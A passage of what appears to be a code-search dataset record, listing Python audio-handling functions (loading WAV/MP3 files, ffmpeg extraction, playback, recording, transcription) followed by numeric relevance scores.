input=True,\n frames_per_buffer=DEFAULT_CHUNK_SIZE)\n\n print(\"Recording...\")\n\n for i in range(0, int(DEFAULT_RATE / DEFAULT_CHUNK_SIZE * RECORD_SECONDS)):\n data = stream.read(DEFAULT_CHUNK_SIZE)\n self.frames.append(data)\n\n print(\"Done.\")\n\n stream.stop_stream()\n stream.close()", "def wavplay(filename):\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\tprint(\"Input file does not exist. 
Make sure you computed the analysis/synthesis\")\n\telse:\n\t\tif sys.platform == \"linux\" or sys.platform == \"linux2\":\n\t\t # linux\n\t\t subprocess.call([\"aplay\", filename])\n\n\t\telif sys.platform == \"darwin\":\n\t\t\t# OS X\n\t\t\tsubprocess.call([\"afplay\", filename])\n\t\telse:\n\t\t\tprint(\"Platform not recognized\")", "def handle_play(self, message):\n self.audio_service.resume()", "def extract(path, quality=\"medium\"):\n\n try:\n file = ffmpeg.input(path)\n output_path = path[:-3] + \"ogg\"\n if os.path.exists(output_path):\n print(\n f\"[{colored('#','yellow')}] Audio file {colored(path2title(output_path),'green')} already exists\"\n )\n return output_path\n print(\n f\"\\n[{colored('+','green')}] Extracting audio for file %s\"\n % (colored(path2title(path), \"green\")),\n end=\"\",\n )\n from util import Animation\n\n anim = Animation()\n file.audio.output(\n output_path,\n acodec=\"libvorbis\",\n audio_bitrate=BITRATE * get_multiplier(quality),\n loglevel=0,\n ).run()\n anim.complete()\n print(\n f\"[{colored('+','green')}] Extraction completed for file %s\"\n % (colored(path2title(output_path), \"green\"))\n )\n\n except Exception as ex:\n print(\n f\"[{colored('-','red')}] There was an error extracting the audio for path {colored(path2title(output_path),'green')}: \",\n ex,\n )\n sys.exit(-1)\n\n return output_path", "def from_file(\n cls,\n audio_file,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n trim_ref=np.max,\n trim_top_db=60,\n trim_frame_length=2048,\n trim_hop_length=512,\n orig_sr=None,\n channel_selector=None,\n normalize_db=None,\n ref_channel=None,\n ):\n samples = None\n if isinstance(audio_file, list):\n return cls.from_file_list(\n audio_file_list=audio_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )\n\n if not isinstance(audio_file, str) or os.path.splitext(audio_file)[-1] in sf_supported_formats:\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n dtype = 'int32' if int_values else 'float32'\n sample_rate = f.samplerate\n if offset > 0:\n f.seek(int(offset * sample_rate))\n if duration > 0:\n samples = f.read(int(duration * sample_rate), dtype=dtype)\n else:\n samples = f.read(dtype=dtype)\n except RuntimeError as e:\n logging.error(\n f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`. 
\"\n f\"NeMo will fallback to loading via pydub.\"\n )\n\n if hasattr(audio_file, \"seek\"):\n audio_file.seek(0)\n\n if HAVE_PYDUB and samples is None:\n try:\n samples = Audio.from_file(audio_file)\n sample_rate = samples.frame_rate\n num_channels = samples.channels\n if offset > 0:\n # pydub does things in milliseconds\n seconds = offset * 1000\n samples = samples[int(seconds) :]\n if duration > 0:\n seconds = duration * 1000\n samples = samples[: int(seconds)]\n samples = np.array(samples.get_array_of_samples())\n # For multi-channel signals, channels are stacked in a one-dimensional vector\n if num_channels > 1:\n samples = np.reshape(samples, (-1, num_channels))\n except CouldntDecodeError as err:\n logging.error(f\"Loading {audio_file} via pydub raised CouldntDecodeError: `{err}`.\")\n\n if samples is None:\n libs = \"soundfile, and pydub\" if HAVE_PYDUB else \"soundfile\"\n raise Exception(f\"Your audio file {audio_file} could not be decoded. We tried using {libs}.\")\n\n return cls(\n samples,\n sample_rate,\n target_sr=target_sr,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )", "def getAudio(self):\n audioString = self.inStream.read(self.BUFFERSIZE)\n self.newAudio = True\n return numpy.fromstring(audioString, dtype=numpy.int16)", "def parse_raw(data):\n for sample in data:\n assert \"src\" in sample\n json_line = sample[\"src\"]\n obj = json.loads(json_line)\n assert \"key\" in obj\n assert \"wav\" in obj\n assert \"txt\" in obj\n key = AishellKeyMapper.encode(obj[\"key\"])\n wav_file = obj[\"wav\"]\n txt = obj[\"txt\"]\n try:\n if \"start\" in obj:\n assert \"end\" in obj\n sample_rate = torchaudio.backend.sox_io_backend.info(wav_file).sample_rate\n start_frame = int(obj[\"start\"] * sample_rate)\n end_frame = int(obj[\"end\"] * sample_rate)\n waveform, _ = torchaudio.backend.sox_io_backend.load(\n filepath=wav_file, num_frames=end_frame - start_frame, frame_offset=start_frame\n )\n else:\n waveform, sample_rate = torchaudio.load(wav_file)\n example = dict(key=key, txt=txt, wav=waveform, sample_rate=sample_rate)\n yield example\n except Exception as ex:\n logging.warning(\"Failed to read {}\".format(wav_file))", "def load_mp3(path):\r\n data, fs = librosa.core.load(path, sr=None)\r\n\r\n return fs, data", "def get_data(path):\n if path.endswith('.mp3'):\n path = prepare_file(path, path.rstrip('mp3')+'wav')\n x, sr = librosa.load(path, duration=30)\n\n else:\n x, sr = librosa.load(path, duration=30)\n directory, file_name = os.path.split(path)\n return x, sr, file_name", "def _load(self, filepath):\n import subprocess as sp\n command = ['ffmpeg',\n '-i', filepath,\n '-f', 's16le',\n '-acodec', 'pcm_s16le',\n '-ac', '1'] # channels: 2 for stereo, 1 for mono\n if self.sampling_rate != SAMPLING_RATE:\n command.extend(['-ar', str(self.sampling_rate)])\n command.append('-')\n # 30s at 44.1 kHz ~= 1.3e6\n proc = sp.run(command, stdout=sp.PIPE, bufsize=10**7, stderr=sp.DEVNULL, check=True)\n\n return np.fromstring(proc.stdout, dtype=\"int16\")", "def extract_audio(file_name, audio_directory):\n basename = os.path.splitext(os.path.basename(file_name))[0]\n audio_file_name = audio_directory + '/' + basename + '.wav'\n subprocess.call(['ffmpeg', '-y', '-i', file_name, '-ac', '1', audio_file_name])\n return audio_file_name", "def read_wav(fname, normalize=True):\n # samps_int16: N x C or 
N\n # N: number of samples\n # C: number of channels\n sampling_rate, samps_int16 = wavfile.read(fname)\n # N x C => C x N\n samps = samps_int16.astype(np.float)\n # tranpose because I used to put channel axis first\n if samps.ndim != 1:\n samps = np.transpose(samps)\n # normalize like MATLAB and librosa\n if normalize:\n samps = samps / MAX_INT16\n return sampling_rate, samps", "def read(self, path):\n pbase = os.path.splitext(path)[0]\n gsid = pbase.split('/')[-2]\n gender, sid = gsid[0], gsid[1:]\n assert sid in self._spkr_table\n phoneseq = phnread(pbase+'.PHN')\n wrdseq = phnread(pbase+'.WRD')\n transcrpt = txtread(pbase+'.TXT')\n sample = TIMITSpeech(\n *audioread(path), speaker=sid, gender=gender,\n transcript=transcrpt, phonemeseq=phoneseq,\n wordseq=wrdseq\n )\n #sample.phonemeseq = [\n # (t, PHONETABLE[p]) for t, p in sample.phonemeseq]\n return sample", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig", "def read_wave(path):\n with contextlib.closing(wave.open(path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None, save_format='numpy',\n global_mean_male=None, global_mean_female=None,\n global_std_male=None, global_std_female=None,\n dtype=np.float32):\n if not is_training:\n if global_mean_male is None or global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance', 'no']:\n raise ValueError(\n 'normalize must be \"utterance\" or \"speaker\" or \"global\" or \"no\".')\n if tool not in ['htk', 'python_speech_features', 'librosa']:\n raise TypeError(\n 'tool must be \"htk\" or \"python_speech_features\"' +\n ' or \"librosa\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: 講演ごとに異なるspeakerとみなす\n\n # Loop 1: Computing global mean and statistics\n if is_training and normalize != 'no':\n print('=====> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_utt_sum, speaker_mean, _, total_frame_num_speaker = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_utt_sum.shape[0]\n global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n global_std_male = np.zeros((feature_dim,), dtype=dtype)\n global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n global_mean_male += input_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n global_mean_female += input_utt_sum\n total_frame_num_female += total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n 
speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: speaker mean is already computed\n\n print('=====> Computing global mean & stddev...')\n # Compute global mean per gender\n global_mean_male /= total_frame_num_male\n global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_utt in input_data_dict_speaker.values():\n global_std_male += np.sum(\n np.abs(input_utt - global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_utt in input_data_dict_speaker.values():\n global_std_female += np.sum(\n np.abs(input_utt - global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # Compute global stddev per gender\n global_std_male = np.sqrt(\n global_std_male / (total_frame_num_male - 1))\n global_std_female = np.sqrt(\n global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'global_mean_male.npy'),\n global_mean_male)\n np.save(join(save_path, 'global_mean_female.npy'),\n global_mean_female)\n np.save(join(save_path, 'global_std_male.npy'),\n global_std_male)\n np.save(join(save_path, 'global_std_female.npy'),\n global_std_female)\n\n # Loop 2: Normalization and Saving\n print('=====> Normalization...')\n frame_num_dict = {}\n sampPeriod, parmKind = None, None\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_utt in input_data_dict_speaker.items():\n\n if normalize == 'no':\n pass\n elif normalize == 'global' or not is_training:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_utt -= global_mean_male\n input_utt /= global_std_male\n elif speaker[3] == 'F':\n input_utt -= global_mean_female\n input_utt /= global_std_female\n else:\n raise ValueError\n elif normalize == 'speaker':\n # Normalize by mean & std per speaker\n input_utt = (input_utt - speaker_mean) / speaker_std\n elif normalize == 'utterance':\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_utt, axis=0, dtype=dtype)\n input_utt = (input_utt - utt_mean) / utt_std\n else:\n raise ValueError\n\n frame_num_dict[speaker + '_' + utt_index] = input_utt.shape[0]\n\n if save_path is not None:\n # Save input features\n if save_format == 'numpy':\n input_data_save_path = mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_utt)\n elif save_format == 'htk':\n if sampPeriod is None:\n _, sampPeriod, parmKind = read(audio_path)\n write(input_utt,\n htk_path=mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.htk'),\n sampPeriod=sampPeriod,\n 
parmKind=parmKind)\n else:\n raise ValueError('save_format is numpy or htk.')\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (global_mean_male, global_mean_female,\n global_std_male, global_std_female, frame_num_dict)", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! (%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def _read_data_into_packet(self, p):\n\n length = p.length * self.disc.audio_format.bytes_per_frame\n\n if p.file_pos is None:\n # Silence, so send on null bytes to player\n p.data = '\\0' * length\n\n else:\n file_pos = p.file_pos * self.disc.audio_format.bytes_per_frame\n self.audio_file.seek(file_pos)\n\n p.data = self.audio_file.read(length)\n length -= len(p.data)\n file_pos += len(p.data)\n\n # If we didn't get all data, iterate with a timeout until\n # it's all been read or the ripping process has stopped.\n # This is not very efficient, and there's a small race\n # condition at the end of the disc, but this should be\n # very rare so keep it unoptimised for now.\n\n while length > 0 and self.is_ripping and self.is_ripping.is_set():\n time.sleep(1)\n\n self.audio_file.seek(file_pos)\n d = self.audio_file.read(length)\n\n length -= len(d)\n file_pos += len(d)\n\n p.data += d\n\n # Still didn't get all data, treat it as an exception\n if length > 0:\n raise SourceError('unexpected end of file, expected at least {0} bytes'\n .format(length))", "def load_audio(fhandle: BinaryIO, sr=None) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=sr, mono=True)\n return audio, sr", "def make_audio(audio_path):\n content, sample_rate = librosa.load(audio_path, sr=16000)\n del sample_rate\n if content.dtype in (np.float32, np.float64):\n content = (content * np.iinfo(np.int16).max).astype(np.int16)\n return speech.RecognitionAudio(content=content.tobytes())", "def load_audio(self):\n\n self.audio_file = tkFileDialog.askopenfilename()\n self.audio_parser = AudioFileParser(self.audio_file)\n\n self.audio_entries = self.audio_parser.entries\n\n for index, entry in enumerate(self.audio_parser.entries):\n self.audio_box.insert(index, entry.word)", "def read(f, normalized=False):\r\n a = pydub.AudioSegment.from_mp3(f)\r\n y = np.array(a.get_array_of_samples())\r\n if a.channels == 2:\r\n y = y.reshape((-1, 2))\r\n if normalized:\r\n return a.frame_rate, np.float32(y) / 2**15\r\n else:\r\n return a.frame_rate, y", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def modulated_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n\n data = np.fromfile(file_name, dtype = np.uint8)\n wave = custom.modulate(data)\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n stream.write(wave)\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def run(self) -> None:\n self._running = True\n while self._running:\n self._ist_mut.acquire()\n self.buff = np.zeros(params.BUF)\n for i in self.ist:\n self.buff += 
np.asarray(struct.unpack('f'*params.BUF, i.read(params.BUF)))\n self.buff /= len(self.ist)\n self._ist_mut.release()\n self.buff = self.transf.apply_all(self.buff)\n self._sou_mut.acquire()\n dels = []\n for i, s in enumerate(self.sounds):\n so_raw = s.read(params.BUF)\n if so_raw == b'':\n dels.append(i)\n continue\n so = np.asarray(struct.unpack(s.format*(len(so_raw)//s.f_size), so_raw)).astype(np.float32)\n so /= 2**(8*s.f_size-1)\n so = np.hstack((so, np.zeros(params.BUF-len(so))))*s.amp\n self.buff = np.average([self.buff, so], axis=0, weights=[.8,.2])\n for d in reversed(dels):\n del self.sounds[d]\n self._sou_mut.release()\n raw = struct.pack('f'*len(self.buff), *self.buff)\n self._ost_mut.acquire()\n for o in self.ost:\n o.write(raw)\n self._ost_mut.release()", "def read_audio_from_stream(stream, sr=None, mono=False, duration=None, exp_format=\"wav\"):\n _, file_ext = stream.filename.rsplit('.', 1)\n ext_converter = {\n 'mp3': AudioSegment.from_mp3,\n }\n converter = ext_converter.get(file_ext)\n if not converter:\n raise InvalidUsage(f\"Invalid extension: {file_ext}\")\n\n with tempfile.NamedTemporaryFile() as ntf:\n sound = converter(stream)\n sound.export(ntf, format=exp_format)\n return read_audio(ntf.name, sr, mono, duration)", "async def transcribe_wav(args: argparse.Namespace, core: Voice2JsonCore) -> None:\n from rhasspyasr import Transcription\n\n # Make sure profile has been trained\n assert core.check_trained(), \"Not trained\"\n\n # Get speech to text transcriber for profile\n transcriber = core.get_transcriber(open_transcription=args.open, debug=args.debug)\n\n # Directory to report WAV file names relative to\n relative_dir = (\n None if args.relative_directory is None else Path(args.relative_directory)\n )\n\n try:\n if args.wav_file or args.stdin_files:\n # Read WAV file paths\n wav_files = args.wav_file\n if args.stdin_files:\n _LOGGER.debug(\"Reading file paths from stdin\")\n wav_files = itertools.chain(wav_files, sys.stdin)\n\n for wav_path_str in wav_files:\n wav_path_str = wav_path_str.strip()\n\n # Load and convert\n wav_path = Path(wav_path_str)\n _LOGGER.debug(\"Transcribing %s\", wav_path)\n\n wav_data = await core.maybe_convert_wav(wav_path.read_bytes())\n\n # Transcribe\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n if relative_dir is None:\n # Add name of WAV file to result\n result[\"wav_name\"] = wav_path.name\n else:\n # Make relative to some directory\n result[\"wav_name\"] = str(\n wav_path.absolute().relative_to(relative_dir.absolute())\n )\n\n print_json(result)\n else:\n # Read WAV data from stdin\n _LOGGER.debug(\"Reading WAV data from stdin\")\n\n if args.input_size:\n # Number of bytes is on separate line\n line = sys.stdin.buffer.readline().strip()\n if not line:\n return\n\n num_bytes = int(line)\n while num_bytes > 0:\n # Read in WAV\n wav_data = sys.stdin.buffer.read(num_bytes)\n while len(wav_data) < num_bytes:\n wav_data = sys.stdin.buffer.read(num_bytes - len(wav_data))\n\n # Transcribe\n wav_data = await core.maybe_convert_wav(wav_data)\n transcription = (\n transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n\n # Next WAV\n line = sys.stdin.buffer.readline().strip()\n if not line:\n break\n\n num_bytes = int(line)\n else:\n # Load and convert entire input\n wav_data = await core.maybe_convert_wav(sys.stdin.buffer.read())\n\n # Transcribe\n transcription = (\n 
transcriber.transcribe_wav(wav_data) or Transcription.empty()\n )\n result = dataclasses.asdict(transcription)\n\n print_json(result)\n finally:\n transcriber.stop()", "def single_analyze_wav(self, filePath):\n\n tChopped, vChopped, fVals,\\\n powerFFT, peakFreqs, peakAmps = Utils.AnalyzeFFT(filePath, tChop=self.settings['processing']['tChop'],\n detail=self.settings['processing']['detail'])\n\n self.analyzeDone.emit(tChopped, vChopped, fVals, powerFFT, peakFreqs, peakAmps, filePath)\n self.update_table(peakFreqs, peakAmps)", "def read(self, filename, normalize=True):\n if self.gcp == False:\n\n\t\t filepath = self.mixed_dir + filename\n\t\t sf, time_signal = wavfile.read(filepath, mmap=True)\n\n else:\n\n blob = list(self.bucket.list_blobs(prefix=filename))[0]\n # download blob as string\n file_as_string = blob.download_as_string()\n sf, time_signal = wavfile.read(io.BytesIO(file_as_string), mmap=True)\n\n\t\tif normalize == True:\n\t\t\t\n # normalization, assuming 2^15 is the highest possible quantization\n\t\t\ttime_signal = time_signal/np.power(2,15)\n\n\t\treturn time_signal", "def load_wav(wav_file):\n rate, data = wavfile.read(wav_file)\n return rate, data", "def read_audio_from_path(path: str) ->Optional[TorchAudioTuple]:\n bytes_obj = get_bytes_obj_from_path(path)\n return read_audio_from_bytes_obj(bytes_obj)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def read(filename):\n\n fileName, fileExtension = os.path.splitext(filename)\n wav_filename = filename\n rate, data = scipy.io.wavfile.read(str(wav_filename)) # the data is read in its native format\n if data.dtype =='int16':\n data = numpy.cast['float'](data)\n return [rate,data]", "def read_wav(filename, offset=0, nframes=None, dtype=torch.double):\n\n if nframes is None: # Load whole file\n fs, x = wavfile.read(filename, mmap=False)\n x = torch.tensor(x, dtype=dtype)\n x.unsqueeze_(dim=0)\n\n else: # Load a part\n with wave.open(filename) as f:\n fs = f.getframerate()\n f.setpos(offset)\n buff = f.readframes(nframes)\n x = torch.tensor(np.frombuffer(buff, np.int16), dtype=dtype)\n x.unsqueeze_(dim=0)\n x -= x.mean()\n\n return x.to(DEVICE), fs", "def process_sound_map():\n pass", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if (name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def _process_audio(self, root: str, id: str) -> bool:\n path = os.path.join(root, id + \".flac\")\n si, _ = torchaudio.info(path)\n duration = (si.length / si.channels) / si.rate\n if self.max_duration is not None and duration > self.max_duration:\n return True\n self.paths.append(path)\n self.durations.append(duration)\n return False", "def 
play_prog(self):\r\n\r\n serial_number = range(47845, 47869)\r\n chord_number = range(1, 25)\r\n for i in self.cnv:\r\n # Look for matching audio files and play them.\r\n try:\r\n filename = \"audio files/{}__{}.wav\".format(serial_number[i-1], chord_number[i-1])\r\n playsound.playsound(filename)\r\n except FileNotFoundError:\r\n print('Error: audio files not found.')", "def _record_audio(self) -> io.BytesIO:\n frames = io.BytesIO()\n audio_stream = self.audio_interface.open(\n channels=self.channels,\n format=self.SAMPLE_FORMAT,\n frames_per_buffer=self.chunk_size,\n input=True,\n rate=self.framerate,\n stream_callback=functools.partial(\n self._fill_audio_buffer,\n frames))\n\n while audio_stream.is_active():\n pass\n\n audio_stream.stop_stream()\n audio_stream.close()\n\n return frames" ]
[ "0.72694874", "0.7045707", "0.6956398", "0.6821181", "0.6742061", "0.6704527", "0.6699321", "0.6644113", "0.6615665", "0.64650714", "0.6453779", "0.63955903", "0.63811314", "0.63749427", "0.6367572", "0.63429946", "0.6340871", "0.633396", "0.6314544", "0.6308602", "0.6294938", "0.6285965", "0.62740135", "0.62489915", "0.623837", "0.6233427", "0.62217736", "0.6196891", "0.618415", "0.6141494", "0.6132818", "0.61327016", "0.6072964", "0.60648024", "0.6053477", "0.6053171", "0.604283", "0.6034881", "0.6016926", "0.6007087", "0.600231", "0.6001837", "0.59928614", "0.5991923", "0.5990197", "0.59824836", "0.5970262", "0.5936505", "0.5935647", "0.5932384", "0.59256643", "0.59164584", "0.5911463", "0.59061843", "0.58888954", "0.588063", "0.5877161", "0.5876366", "0.58651054", "0.5862576", "0.58527976", "0.5828484", "0.5814212", "0.580452", "0.5789877", "0.5788685", "0.5775275", "0.5768632", "0.5764965", "0.5760695", "0.5758041", "0.5740839", "0.5739856", "0.57366556", "0.57348984", "0.57348984", "0.5731569", "0.5728181", "0.57270306", "0.57072973", "0.56976074", "0.5685951", "0.56839347", "0.568042", "0.5676626", "0.56749207", "0.5664367", "0.5664219", "0.5659049", "0.56504446", "0.5648043", "0.5646563", "0.56454086", "0.5641915", "0.56326896", "0.56307846", "0.56233025", "0.5617952", "0.56137264", "0.5613083", "0.5612471" ]
0.0
-1
Compute log mel filterbank features with deltas and double deltas
def _extract_fbank(self, sig, sr):
    emphasized_signal = np.append(sig[0], sig[1:] - 0.97 * sig[:-1])
    frame_length, frame_step = FRAME_SIZE * sr, FRAME_STRIDE * sr
    signal_length = len(emphasized_signal)
    frame_length = int(round(frame_length))
    frame_step = int(round(frame_step))
    num_frames = int(np.ceil(float(np.abs(signal_length - frame_length)) / frame_step))
    pad_signal_length = num_frames * frame_step + frame_length
    z = np.zeros((pad_signal_length - signal_length))
    pad_signal = np.append(emphasized_signal, z)
    indices = np.tile(np.arange(0, frame_length), (num_frames, 1)) + np.tile(np.arange(0, num_frames * frame_step, frame_step), (frame_length, 1)).T
    frames = pad_signal[indices.astype(np.int32, copy=False)]
    # Apply the Hamming window function
    frames *= np.hamming(frame_length)
    nfft, nfilt = 512, 40
    mag_frames = np.absolute(np.fft.rfft(frames, nfft))
    pow_frames = ((1.0 / nfft) * (mag_frames ** 2))
    low_freq_mel = 0
    ### AI:
    # the following line works correctly as-is in python3
    # *** high_freq_mel = (2595 * np.log10(1 + (sr / 2) / 700)) ***
    # however, in python 2 it results in a smaller value of 'high_freq_mel'
    # as the 'sr' variable is interpreted as integer
    # it has minor impact on the performance of the natively trained and tested models
    # however, if one uses python 2 to test the models that were created in python3
    # the models show a CER drop of as much as 1% absolute
    # the line below fixes that issue completely
    high_freq_mel = (2595 * np.log10(1 + (float(sr) / 2) / 700))
    mel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2)
    hz_points = (700 * (10**(mel_points / 2595) - 1))
    bin = np.floor((nfft + 1) * hz_points / sr)
    fbank = np.zeros((nfilt, int(np.floor(nfft / 2 + 1))))
    for m in range(1, nfilt + 1):
        f_m_minus = int(bin[m - 1])  # left
        f_m = int(bin[m])            # center
        f_m_plus = int(bin[m + 1])   # right
        for k in range(f_m_minus, f_m):
            fbank[m - 1, k] = (k - bin[m - 1]) / (bin[m] - bin[m - 1])
        for k in range(f_m, f_m_plus):
            fbank[m - 1, k] = (bin[m + 1] - k) / (bin[m + 1] - bin[m])
    filter_banks = np.dot(pow_frames, fbank.T)
    filter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks)
    # AI:
    # *** filter_banks = 20 * np.log10(filter_banks) ***
    # 'pow_frames' contains the power spectrum (i.e. squared magnitude)
    # the proper formula to convert to the logarithm scale in decibels is
    # 10*log10(POW), while 20*log10(MAG) is used for the un-squared magnitude
    # this way both formulae result in the same outcome
    filter_banks = 10 * np.log10(filter_banks)
    # Apply mean normalization
    filter_banks -= (np.mean(filter_banks, axis=0) + 1e-8)
    filter_banks = filter_banks.transpose()
    delta = librosa.feature.delta(filter_banks)
    double_delta = librosa.feature.delta(delta)
    fbank_feat = np.vstack([filter_banks, delta, double_delta])
    fbank_feat = fbank_feat.transpose()
    assert np.shape(fbank_feat)[1] == 120, "input dimensions incorrect"
    # Truncate if audio sequence is too long
    fbank_length = len(fbank_feat)
    if fbank_length > self.max_input_seq_length:
        fbank_feat = fbank_feat[:self.max_input_seq_length]
    return fbank_feat, fbank_length
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def logMelSpectrum(input, samplingrate):\n nfft = input.shape[1]\n N = input.shape[0]\n filters = trfbank(samplingrate, nfft)\n\n # plot Mel filters\n # plt.plot(filters)\n # plt.title('Mel filters')\n # plt.show()\n\n output = np.zeros((N, filters.shape[0]))\n for j in range(filters.shape[0]): # apply each filterbank to the whole power spectrum\n for i in range(N):\n output[i, j] = np.log(np.sum(input[i] * filters[j]))\n\n # myplot(output, 'Filter Banks')\n\n return output", "def statePosteriors(log_alpha, log_beta):\n return log_alpha + log_beta - logsumexp(log_alpha[-1,:])", "def log2FC_data(data):\n log2FC_df = pd.DataFrame()\n for i in range(0,len(data.columns),10):\n i = i\n data_subset = data[data.columns[i:i+10]]\n log_data = data_subset.apply(np.log2)\n \n new_df = pd.DataFrame()\n for j in range(len(log_data.columns)):\n tmp_col = log_data.iloc[:, j].name\n tmp_df = log_data.iloc[:,0] - log_data.iloc[:,j]\n new_df[tmp_col] = tmp_df\n \n log2FC_df = log2FC_df.append(new_df.T)\n log2FC_df = log2FC_df.T\n return log2FC_df", "def statePosteriors(log_alpha, log_beta):", "def extract_features(self, np_samples):\n log_mel_examples = []\n samples = np_samples.shape[0]\n if self._normalize:\n min_ratio = 0.1 # = 10^(max_db/-20) with max_db = 20\n np_samples /= np.maximum(min_ratio, np.amax(np_samples))\n if self._step_size is not None:\n samples_splits = []\n for i in xrange(0, samples - vggish_params.SAMPLE_RATE + 1,\n self._step_size):\n samples_splits.append(np_samples[i:i + vggish_params.SAMPLE_RATE])\n else:\n samples_splits = np.split(np_samples, samples / vggish_params.SAMPLE_RATE)\n # Compute log mel spectrogram features.\n for samples_window in 